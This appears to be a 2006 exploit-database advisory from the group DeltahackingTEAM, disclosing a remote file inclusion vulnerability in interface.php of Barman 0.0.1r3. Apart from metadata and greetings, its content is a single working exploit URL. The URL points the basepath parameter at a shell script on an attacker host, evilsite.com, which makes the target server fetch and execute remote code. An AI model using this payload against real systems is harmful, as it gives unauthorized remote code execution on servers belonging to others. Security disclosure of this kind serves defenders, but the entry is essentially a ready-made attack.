id: 1253
date: 12/11/2006
title: Barman 0.0.1r3 (interface.php) Remote File Include Vulnerability
author: DeltahackingTEAM
cves: 

================================================================
Barman 0.0.1r3 (interface.php) Remote File Include Vulnerability
================================================================



**********************************************************************************************************

* Portal Name = Barman 0.0.1r3

* Class = Remote File Inclusion

* Risk = High (Remote File Execution)

* Download = http://downloads.sourceforge.net/barman/Barman-0.0.1r3.tgz

* Discoverd By = DeltahackingTEAM

* User In Delta Team = Davood_Cracker

* Just Delta Hacking Security TEAM *
--------------------------------------------------------------------------------------------

- Exploit:


http://localhost/[PATH]/interface.php?basepath=http://evilsite.com/shell?


--------------------------------------------------------------------------------------------

Gr33tz : Dr.Trojan , Hiv++ , D_7j , Vpc

SP TNX : Dr.Pantagon

**********************************************************************************************************



#  0day.today [2023-03-21]  #